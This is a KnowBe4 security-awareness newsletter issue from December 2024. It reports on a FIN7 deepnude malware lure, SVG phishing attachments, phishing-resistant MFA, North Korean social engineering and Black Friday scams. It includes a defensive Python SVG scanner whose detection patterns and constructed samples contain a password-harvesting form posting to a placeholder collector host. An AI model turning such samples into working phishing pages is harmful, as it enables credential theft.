CyberheistNews Vol 14 #49 | December 3rd, 2024
[Heads Up] Bad Actor Uses Deepnude AI Image Generator to Lure And Infect Users
The threat group FIN7 is using the lure of generating nude images of favorite celebrities to get victims to download their NetSupport RAT.
In any social engineering scam, there's always the need to create some sense of urgency to act in order to make the potential victim take an action that enables the attack. In the case of a new attack by threat group FIN7, the urgency appears to be the desire to see deepfake nude images.
According to cybersecurity vendor SilentPush's analysis of Russia-connected FIN7's activities, the threat group hosted seven honeypot websites using domain names that included the phrase "ai-nude" in them.
The victim is prompted to upload an image and is then told their generated image is ready for download – with the download being a .zip file carrying a malicious payload.
SilentPush warns organizations to be wary of this attack and others like it, as they note that the malware being installed may compromise corporate credentials via infostealer functionality.
Organizations that enroll their employees in new-school security awareness training are better prepared for these kinds of malvertising-based cyberattacks. Sure, the deepfake nudes lure is a real outlier here, but training does educate the employee on why it's not advisable to visit and download files from unknown websites.
Blog post with links:
https://blog.knowbe4.com/threat-group-use-ai-adult-based-deepnude-image-generator-to-infect-victims
[New!] Check Out These Powerful New KnowBe4 AI Features
Join us TOMORROW, Wednesday, December 4, @ 2:00 PM (ET), for a live demo of how KnowBe4 introduces Human Risk Management with AI Defense Agents providing unparalleled, personalized security awareness training to your workforce. It quickens the learning process and reduces your organization's risk score:
- NEW! AIDA - Artificial Intelligence Driven Agents - How do they work?
- NEW! The SmartRisk Agent Version 2.0 - What was improved?
- Executive Reporting - See for yourself the extreme power of the custom features!
Find out how nearly 70,000 organizations have mobilized their end users as their human firewall.
Date/Time: TOMORROW, Wednesday, December 4, @ 2:00 PM (ET)
Save My Spot!
https://info.knowbe4.com/en-us/kmsat-demo-3?partnerref=CHN2
Phishing Emails Use SVG Files to Avoid Detection
Phishing emails are increasingly using Scalable Vector Graphics (SVG) attachments to display malicious forms or deliver malware, BleepingComputer reports.
SVG is an image format that's stored in XML text files, allowing users to create an image through XML code by specifying shapes, colors, and text. Threat actors are using these files to craft convincing phishing forms that can bypass security filters.
"SVG attachments used in a recent campaign pretend to be official documents or requests for more information, prompting you to click the download button, which then downloads malware from a remote site," BleepingComputer says.
"Other campaigns utilize SVG attachments and embedded JavaScript to auto-redirect browsers to sites hosting phishing forms when the image is opened. The problem is that since these files are mostly just textual representations of images, they tend not to be detected by security software that often.
"From samples seen by BleepingComputer and uploaded to VirusTotal, at the most, they have one or two detections by security software."
Users should be on the lookout for SVG attachments, since they aren't commonly used by most businesses. If an SVG file displays what looks like an Excel spreadsheet with a login portal, for example, it's certainly a phishing attempt.
"Receiving an SVG attachment is not common for legitimate emails, and should immediately be treated with suspicion," BleepingComputer says. "Unless you are a developer and expect to receive these types of attachments, it is safer to delete any emails containing them."
Something to add to the filters. Blog post with links:
https://blog.knowbe4.com/phishing-emails-use-svg-files-to-avoid-detection-1
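One way to act on "something to add to the filters", as an added example that is not code from BleepingComputer or KnowBe4: a Python check that treats an SVG attachment as a document rather than an image and reports the active content described above (scripts, event handlers, embedded HTML forms, remote links). The function names, finding labels and sample files are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Elements that turn an SVG "image" into an active document.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "form"}
LINK_ATTRS = {"href", "src", "action"}
REMOTE_URL = re.compile(r"^\s*(https?:)?//", re.I)
SCRIPT_URL = re.compile(r"^\s*(javascript:|data:text/html)", re.I)

def local(name: str) -> str:
    """Drop the '{namespace}' prefix ElementTree adds to tag and attribute names."""
    return name.rsplit("}", 1)[-1].lower()

def scan_svg(data: bytes) -> list[str]:
    """Return reasons to quarantine an SVG attachment (empty list: none found)."""
    # Entity declarations have no place in a mailed image; refuse before parsing.
    if re.search(rb"<!ENTITY", data, re.I):
        return ["entity-declaration"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["malformed-xml"]
    findings = set()
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.add(f"active-element:{tag}")
        for name, value in el.attrib.items():
            attr = local(name)
            if attr.startswith("on"):            # onload, onclick, ...
                findings.add(f"event-handler:{attr}")
            elif attr in LINK_ATTRS and SCRIPT_URL.match(value):
                findings.add(f"script-url:{attr}")
            elif attr in LINK_ATTRS and REMOTE_URL.match(value):
                findings.add(f"remote-link:{attr}")
    return sorted(findings)

# Constructed samples (not taken from any real campaign).
SVG_NS = b'xmlns="http://www.w3.org/2000/svg"'
SAMPLES = {
    "logo.svg": b'<svg %s viewBox="0 0 10 10"><circle cx="5" cy="5" r="4"/></svg>' % SVG_NS,
    "invoice.svg": b'<svg %s onload="void 0"><script>/* redirect code */</script></svg>' % SVG_NS,
    "statement.svg": b'<svg %s><foreignObject width="300" height="200">'
                     b'<form xmlns="http://www.w3.org/1999/xhtml" '
                     b'action="https://collector.example.invalid/submit">'
                     b'<input type="password" name="p"/></form></foreignObject></svg>' % SVG_NS,
    "entity.svg": b'<!DOCTYPE svg [<!ENTITY a "b">]><svg %s/>' % SVG_NS,
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, scan_svg(blob) or "clean")
```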
[NEW WHITEPAPER] AI vs. AI: Combating Cybercriminals with an AI-Powered Security Awareness Training Program
Cybercriminals are diving into AI to make the world more dangerous for the rest of us.
Fortunately, infosec professionals like you can do something about it. Chances are you're already applying AI across your tech stack. Why not leverage it to fortify your human firewall? When it comes to the vital human element of cybersecurity, the power of AI can be used to your advantage to engage users with relevant training and keep them informed against evolving cyber attacks.
This whitepaper discusses ways bad actors are using AI for their own devices. It also explores what a robust security awareness training (SAT) and simulated phishing program with AI at its core can bring to a comprehensive cybersecurity initiative.
You'll learn:
- How bad actors are using AI to supercharge their attacks
- What smarter human risk management powered by AI can look like
- How generative AI can augment existing strengths to improve security culture
Download Now:
https://info.knowbe4.com/wp-ai-powered-security-awareness-ksat-chn
CISA Strongly Recommends Phishing-Resistant MFA
By Roger Grimes
We are excited to see the Cybersecurity and Infrastructure Security Agency (CISA) and outgoing Director Jen Easterly strongly recommend PHISHING-RESISTANT multi-factor authentication (MFA).
The majority of people, including the majority of cybersecurity practitioners, do not know that most MFA, especially the most popular types used today (e.g., one-time passwords, push-based, SMS-based, etc.), can be as easily phished or bypassed as the passwords they were intended to replace.
We have been huge advocates for PHISHING-RESISTANT MFA since the beginning of the latest MFA push six years ago, and we were among the first companies to promote PHISHING-RESISTANT forms of MFA. When you first read or heard the phrase PHISHING-RESISTANT MFA, there was a good chance it was from us.
We were certainly the loudest, most consistent early advocates. Even today, we likely have the only inclusive list of PHISHING-RESISTANT MFA solutions on the Internet.
The Beginning
Our PHISHING-RESISTANT MFA journey began back on May 5, 2018, when late Chief Hacking Officer Kevin Mitnick created and published a video demonstrating how easy it was to bypass very popular MFA using simple phishing. Here is the related article published on KnowBe4's blog.
[CONTINUED] on the KnowBe4 Blog post with links:
https://blog.knowbe4.com/cisa-strongly-recommends-phishing-resistant-mfa
Can You Be Spoofed?
Are you aware that one of the first things hackers try is to see whether they can spoof the email address of someone in your domain?
This is how "CEO fraud" spear-phishing attacks are launched on your org. Such attacks are hard to defend against, unless your users know what to look for.
Are your email servers vulnerable to spoofing? KnowBe4 can help you find out with our free Domain Spoof Test. It's quick, easy and often a shocking discovery.
Find out now if your email server is configured correctly. Many are not!
- This is a simple, non-intrusive "pass/fail" test
- We will send a spoofed email "from you to you"
- If it makes it through into your inbox, you know you have a problem
- You'll know within 48 hours!
Try to Spoof Me!
https://info.knowbe4.com/domain-spoof-test-1-chn
Let's stay safe out there.
Warm regards,
Stu Sjouwerman, SACP
Founder and CEO
KnowBe4, Inc.
PS: You really, really want to see KnowBe4's new powerful AI features available right now:
https://info.knowbe4.com/en-us/kmsat-demo-3?partnerref=CHN
PPS: OODA Loop's Top 10 Security, Technology, & Business Books of 2024:
https://oodaloop.com/analysis/decision-intelligence/top-10-security-technology-business-books-of-2024/
- René Descartes - Philosopher (1596 - 1650)
- Robert Frost - Poet (1874 - 1963)
You can read CyberheistNews online at our Blog
https://blog.knowbe4.com/cyberheistnews-vol-14-49-heads-up-bad-actor-uses-deepnude-ai-image-generator-to-lure-and-infect-users
North Korean Hackers Use Social Engineering For Cybercrime and Espionage
Researchers at Microsoft have outlined social engineering tactics used by several state-sponsored North Korean threat actors. North Korean government hackers often conduct cyberespionage in support of Pyongyang's weapons program, or they commit cybercrime in order to fund their heavily sanctioned regime.
One group Microsoft tracks as "Sapphire Sleet" impersonates investors or job recruiters in an attempt to trick victims into installing malware designed to steal cryptocurrency.
"Sapphire Sleet masquerades as a recruiter on professional platforms like LinkedIn and reaches out to potential victims," the researchers write. "The threat actor, posing as a recruiter, tells the target user that they have a job they are trying to fill and believe that the user would be a good candidate.
"To validate the skills listed on the target user's profile, the threat actor asks the user to complete a skills assessment from a website under the threat actor's control. The threat actor sends the target user a sign-in account and password.
"In signing in to the website and downloading the code associated with the skills assessment, the target user downloads malware onto their device, allowing the attackers to gain access to the system."
North Korea has also deployed thousands of IT workers tasked with gaining fraudulent employment at foreign companies, in order to collect a paycheck while attempting to steal intellectual property, source code, or trade secrets. In some cases, these workers steal sensitive data and attempt to extort a ransom from the company in exchange for keeping the data private.
Microsoft says these individuals operate out of North Korea, Russia, and China, and are assisted by willing or unwitting facilitators in other countries.
Notably, the IT workers are now using AI tools to help craft convincing online personas. "Microsoft has observed that, in addition to using AI to assist with creating images used with job applications, North Korean IT workers are experimenting with other AI technologies such as voice-changing software," the researchers write.
"This aligns with observations shared in earlier blogs showing threat actors using AI as a productivity tool to refine their attack techniques. While we do not see threat actors using combined AI voice and video products as a tactic, we do recognize that if actors were to combine these technologies, it's possible that future campaigns may involve IT workers using these programs to attempt to trick interviewers into thinking they are not communicating with a North Korean IT worker."
Microsoft has the story:
https://www.microsoft.com/en-us/security/blog/2024/11/22/microsoft-shares-latest-intelligence-on-north-korean-and-chinese-threat-actors-at-cyberwarcon/
Three in Four Black Friday Spam Emails Were Scams
Three out of four Black Friday-themed spam emails are scams, according to researchers at Bitdefender. Most of these scams are targeting users in the US and Europe.
"This year, 77% of all Black Friday-themed spam (by volume) analyzed by Bitdefender's Antispam Lab team was classified as scams, while only 22% was identified as marketing lures—emails designed to drive traffic to legitimate but overly aggressive promotions," the researchers write.
"In 2023, 7 out of every 10 Black Friday-themed spam emails were scams, compared to 2024, when this figure rose to 3 out of every 4 emails. This 7% increase in scam prevalence underscores the greed and daring of cybercriminals, who increasingly leverage fake offers and phishing tactics to exploit consumer shopping behaviors and trends."
Threat actors are tailoring their scams to specific regions, using familiar social engineering techniques to trick people into acting quickly.
"As in our previous Black Friday scam trends analysis, scammers leaned heavily on impersonating trusted brands and leveraging psychological tactics such as urgency and exclusivity," Bitdefender says. "Fraudulent emails promised exclusive or early access to Black Friday deals and rewards in exchange for survey participation or irresistible discounts on mystery boxes for submitting payment details.
"Counterfeit Rolex watches, Louis Vuitton bags, and Ray-Ban sunglasses are among the recurring themes and usual suspects in this year's Black Friday scam agenda, with scammers luring shoppers with realistic websites and too-good-to-be-true prices."
Predictably, these scams have steadily increased in the days ahead of Black Friday. Similar shopping scams should be expected to continue throughout the holiday season, however.
"Spam activity surged in the lead-up to Black Friday, with a noticeable uptick starting in late October," the researchers write. "According to data gathered between Oct. 1 and Nov. 17, 2024, Black Friday spam rates peaked at over 6% of total Black Friday Spam email volume, showing a significant increase compared to early October.
"The spikes in activity align with the shopping season's momentum as scammers leverage the heightened consumer interest in deals."
Set up a campaign to alert your users.
What KnowBe4 Customers Say
"I can't speak enough for what a great job Max B. does as our CSM. I look forward to working with him during our regular quarterly meetings. He always comes well prepared with ideas and suggestions for new training and phishing campaigns.
He has helped me set up monthly Scam of the Week and Security Hints & Tips campaigns that almost serve as monthly newsletters for us. He is creative on how to use the KnowBe4 platform to get the most bang for our buck out of the system. He is also extremely flexible when my life goes awry, he never has a problem rescheduling and getting our meeting fit back into his schedule.
Max does an awesome job at representing KnowBe4. Thanks…"
- P.J., Manager of IT Infrastructure & Cybersecurity
- The only thing worse than being fired is scammers fooling you into thinking you're fired:
https://www.theregister.com/2024/11/28/fired_phishing_campaign_cloudflare/
- KnowBe4 Predicts AI Advances Will Shape Evolving Landscape of Cyber Threats and Defenses:
https://www.morningstar.com/news/pr-newswire/20241125fl65182/knowbe4-predicts-ai-advances-will-shape-evolving-landscape-of-cyber-threats-and-defenses
- Interpol Clamps Down on Cybercrime and Arrests Over 1,000 Suspects in Africa:
https://www.interpol.int/en/News-and-Events/News/2024/Major-cybercrime-operation-nets-1-006-suspects
- Google takes down fake news sites, wire services run by Chinese influence operation:
https://therecord.media/google-fake-news-china-outlets
- KnowBe4 started a trend. "How to recognize employment fraud before it becomes a security issue":
https://www.helpnetsecurity.com/2024/11/26/employment-fraud-red-flags/
- AI viewed as phishing threat as well as defense, in new survey:
https://www.scworld.com/news/ai-viewed-as-phishing-threat-as-well-as-defense-in-new-survey
- Google launches a regular scams and fraud advisory. Two of our evangelists quoted:
https://www.securitymagazine.com/articles/101211-google-launches-a-regular-scams-and-fraud-advisory
- Russian cyberespionage campaign targets former Soviet states:
https://www.recordedfuture.com/research/russia-aligned-tag-110-targets-asia-and-europe
- New credit card skimmer malware targets online checkout pages:
https://blog.sucuri.net/2024/11/credit-card-skimmer-malware-targeting-magento-checkout-pages.html
- Hacktivist group launches ransomware attacks in support of Russia:
https://therecord.media/cybervolk-india-hacktivists-russia-ransomware
- Virtual Vaca #1 - Tired of the Tourist Crowds? Check Out Italy's Calabria Region:
https://youtu.be/QwB5D_iLyx0
- Virtual Vaca #2 Bolivia in 4K - Incredible Scenes & Hidden Gems:
https://youtu.be/56U-OdXF9eQ
- New TRAILER: Mission Impossible – The Final Reckoning (New 2025 Movie):
https://youtu.be/NOhDyUmT9z0
- Unbelievable 😮 4K 60fps HDR Dolby Vision 4K Video ULTRA HD:
https://youtu.be/HZ8VF0EdITk
- The Insane Engineering of Singapore's Changi Airport:
https://youtu.be/QfO4MMFXD-w
- LockPickingLawyer: Unity's "Anti-Pick" Disc Lock… Picked:
https://youtu.be/jqKpVPvVMJ4
- "The Crackinator", A Wingsuit Flight Into A Crack:
https://youtu.be/v0XHTLXMV-Y
- A never-ending stream of Bugattis leaving the Wynn Hotel for the Formula 1 Las Vegas Grand Prix race. Which one do you like the best?:
https://youtu.be/7T-8cNl9Tig
- [SUPER FAVE] Totally Brilliant Dani DaOrtiz at Fool US 2022 (the one act that Penn and Teller didn't even try to figure out):
https://youtu.be/5_KcQt0z-eE
- Extreme Weather & Storm Chasing Photography with Mike Mezeul II & Nikon Z8:
https://youtu.be/l6IbuFPd4N4
- Witness the jaw-dropping first descent of an uncharted, perilous peak that pushes the limits of human endurance and skill:
https://www.flixxy.com/the-ride-of-a-lifetime-conquering-the-steepest-snowboarding-peak.htm?utm_source=4
- For Da Kids #1 - Velcro Bird Won't Let Woman Have Work Calls:
https://youtu.be/jCZOi7bZLYM
- For Da Kids #2 - Rescue hyena loves to snuggle:
https://youtu.be/AiE-UU-GMq0
- For Da Kids #3 - Guy Rescues Duckling Families Every Year:
https://youtu.be/kCTYda8DvjI
- For Da Kids #4 - Photographer Has No Idea What This Eagle Grabbed:
https://youtu.be/SDnc6xux6L4
- For Da Kids #5 - Tiny Piglet Will Squeal Non-Stop Until He Gets His Scratches:
https://youtu.be/cTteHDQAsAA